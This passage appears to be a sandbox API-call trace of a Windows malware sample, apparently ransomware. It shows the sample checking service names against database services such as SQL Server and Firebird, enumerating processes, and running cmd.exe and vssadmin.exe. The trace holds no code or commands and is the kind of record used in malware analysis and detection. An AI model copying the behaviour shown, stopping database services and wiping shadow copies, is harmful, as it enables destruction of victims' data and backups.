(lpString1="sqlwriter", lpString2="NcbService") returned 1 [0313.004] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0313.005] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0313.005] lstrlenW (lpString="netprofm") returned 8 [0313.005] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0313.005] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0313.005] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0313.005] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0313.005] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0313.005] lstrlenW (lpString="NgcSvc") returned 6 [0313.005] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0313.005] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0313.005] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0313.005] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0313.005] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0313.005] lstrlenW (lpString="NlaSvc") returned 6 [0313.005] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0313.005] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0313.005] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0313.005] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0313.005] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0313.006] lstrlenW (lpString="nsi") returned 3 [0313.006] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0313.006] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0313.006] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0313.006] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0313.006] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0313.006] lstrlenW (lpString="PcaSvc") returned 6 [0313.006] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0313.006] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0313.006] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0313.006] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0313.006] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0313.006] lstrlenW (lpString="PlugPlay") returned 8 [0313.006] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0313.006] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0313.006] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0313.006] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0313.007] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0313.007] lstrlenW (lpString="Power") returned 5 [0313.007] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0313.007] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0313.007] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0313.007] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0313.007] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0313.007] lstrlenW (lpString="ProfSvc") returned 7 [0313.007] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0313.007] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0313.007] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0313.007] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0313.007] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0313.007] lstrlenW (lpString="RpcEptMapper") returned 12 [0313.007] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0313.007] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0313.009] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0313.009] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0313.009] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0313.009] lstrlenW (lpString="RpcSs") returned 5 [0313.009] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0313.009] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0313.010] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0313.010] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0313.010] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0313.010] lstrlenW (lpString="SamSs") returned 5 [0313.010] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0313.010] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0313.010] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0313.010] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0313.010] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0313.010] lstrlenW (lpString="Schedule") returned 8 [0313.010] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0313.010] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0313.010] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0313.010] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0313.010] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0313.010] lstrlenW (lpString="SecurityHealthService") returned 21 [0313.010] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0313.010] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0313.010] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0313.011] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0313.011] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0313.011] lstrlenW (lpString="SENS") returned 4 [0313.011] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0313.011] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0313.011] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0313.011] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0313.011] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0313.011] lstrlenW (lpString="ShellHWDetection") returned 16 [0313.011] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0313.011] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0313.011] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0313.011] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0313.011] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0313.011] lstrlenW (lpString="Spooler") returned 7 [0313.011] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0313.011] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0313.011] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0313.011] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0313.011] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0313.012] lstrlenW (lpString="StateRepository") returned 15 [0313.012] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0313.012] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0313.012] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0313.012] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0313.012] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0313.012] lstrlenW (lpString="SysMain") returned 7 [0313.012] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0313.012] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0313.012] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0313.012] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0313.012] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0313.012] lstrlenW (lpString="SystemEventsBroker") returned 18 [0313.012] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0313.012] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0313.012] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0313.012] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0313.012] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0313.012] lstrlenW (lpString="Themes") returned 6 [0313.013] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0313.013] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0313.013] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0313.013] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0313.013] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0313.013] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0313.013] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0313.013] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0313.013] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0313.013] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0313.013] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4150d60 | out: hHeap=0x470000) returned 1 [0313.013] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x548 [0313.022] Process32FirstW (in: hSnapshot=0x548, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0313.023] Process32NextW (in: hSnapshot=0x548, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0313.024] lstrlenW (lpString="System") returned 6 [0313.024] Process32NextW (in: hSnapshot=0x548, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0313.025] lstrlenW (lpString="smss.exe") returned 8 [0313.025] Process32NextW (in: hSnapshot=0x548, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0313.026] lstrlenW (lpString="csrss.exe") returned 9 [0313.026] Process32NextW (in: hSnapshot=0x548, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0313.027] lstrlenW (lpString="wininit.exe") returned 11 [0313.027] Process32NextW (in: hSnapshot=0x548, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0313.028] lstrlenW (lpString="csrss.exe") returned 9 [0313.028] Process32NextW (in: hSnapshot=0x548, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0313.028] lstrlenW (lpString="winlogon.exe") returned 12 [0313.029] Process32NextW (in: hSnapshot=0x548, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0313.029] lstrlenW (lpString="services.exe") returned 12 [0313.029] Process32NextW (in: hSnapshot=0x548, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0313.030] lstrlenW (lpString="lsass.exe") returned 9 [0313.030] Process32NextW (in: hSnapshot=0x548, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0313.031] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0313.032] Process32NextW (in: hSnapshot=0x548, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0313.032] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0313.032] Process32NextW (in: hSnapshot=0x548, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.033] lstrlenW (lpString="svchost.exe") returned 11 [0313.033] Process32NextW (in: hSnapshot=0x548, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.034] lstrlenW (lpString="svchost.exe") returned 11 [0313.034] Process32NextW (in: hSnapshot=0x548, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0313.035] lstrlenW (lpString="dwm.exe") returned 7 [0313.035] Process32NextW (in: hSnapshot=0x548, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.036] lstrlenW (lpString="svchost.exe") returned 11 [0313.036] Process32NextW (in: hSnapshot=0x548, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.037] lstrlenW (lpString="svchost.exe") returned 11 [0313.037] Process32NextW (in: hSnapshot=0x548, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3f, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.038] lstrlenW (lpString="svchost.exe") returned 11 [0313.038] Process32NextW (in: hSnapshot=0x548, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x16c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.038] lstrlenW (lpString="svchost.exe") returned 11 [0313.038] Process32NextW (in: hSnapshot=0x548, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.041] lstrlenW (lpString="svchost.exe") returned 11 [0313.041] Process32NextW (in: hSnapshot=0x548, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x490, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.041] lstrlenW (lpString="svchost.exe") returned 11 [0313.041] Process32NextW (in: hSnapshot=0x548, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x52c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.042] lstrlenW (lpString="svchost.exe") returned 11 [0313.042] Process32NextW (in: hSnapshot=0x548, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.043] lstrlenW (lpString="svchost.exe") returned 11 [0313.043] Process32NextW (in: hSnapshot=0x548, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.043] lstrlenW (lpString="svchost.exe") returned 11 [0313.043] Process32NextW (in: hSnapshot=0x548, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.044] lstrlenW (lpString="svchost.exe") returned 11 [0313.044] Process32NextW (in: hSnapshot=0x548, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0313.044] lstrlenW (lpString="spoolsv.exe") returned 11 [0313.045] Process32NextW (in: hSnapshot=0x548, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.045] lstrlenW (lpString="svchost.exe") returned 11 [0313.045] Process32NextW (in: hSnapshot=0x548, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0313.046] lstrlenW (lpString="audiodg.exe") returned 11 [0313.046] Process32NextW (in: hSnapshot=0x548, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0313.049] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0313.049] Process32NextW (in: hSnapshot=0x548, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0313.050] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0313.050] Process32NextW (in: hSnapshot=0x548, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0313.051] lstrlenW (lpString="Memory Compression") returned 18 [0313.051] Process32NextW (in: hSnapshot=0x548, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0313.052] lstrlenW (lpString="sihost.exe") returned 10 [0313.052] Process32NextW (in: hSnapshot=0x548, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.052] lstrlenW (lpString="svchost.exe") returned 11 [0313.052] Process32NextW (in: hSnapshot=0x548, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0313.053] lstrlenW (lpString="taskhostw.exe") returned 13 [0313.053] Process32NextW (in: hSnapshot=0x548, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x38, th32ParentProcessID=0xa10, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0313.054] lstrlenW (lpString="explorer.exe") returned 12 [0313.054] Process32NextW (in: hSnapshot=0x548, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0313.056] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0313.056] Process32NextW (in: hSnapshot=0x548, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0313.056] lstrlenW (lpString="SearchUI.exe") returned 12 [0313.056] Process32NextW (in: hSnapshot=0x548, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x744, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0313.058] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0313.058] Process32NextW (in: hSnapshot=0x548, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0313.058] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0313.058] Process32NextW (in: hSnapshot=0x548, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0xa24, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 1 [0313.059] lstrlenW (lpString="wdgmug.exe") returned 10 [0313.059] Process32NextW (in: hSnapshot=0x548, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xdd0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0313.060] lstrlenW (lpString="cmd.exe") returned 7 [0313.060] Process32NextW (in: hSnapshot=0x548, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0313.061] lstrlenW (lpString="conhost.exe") returned 11 [0313.061] Process32NextW (in: hSnapshot=0x548, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0313.062] lstrlenW (lpString="vssadmin.exe") returned 12 [0313.062] Process32NextW (in: hSnapshot=0x548, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xebc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="consent.exe")) returned 1 [0313.062] lstrlenW (lpString="consent.exe") returned 11 [0313.063] Process32NextW (in: hSnapshot=0x548, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xebc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="consent.exe")) returned 0 [0313.063] CloseHandle (hObject=0x548) returned 1 [0313.064] Sleep (dwMilliseconds=0x1f4) [0313.697] OpenSCManagerW (lpMachineName=0x0, 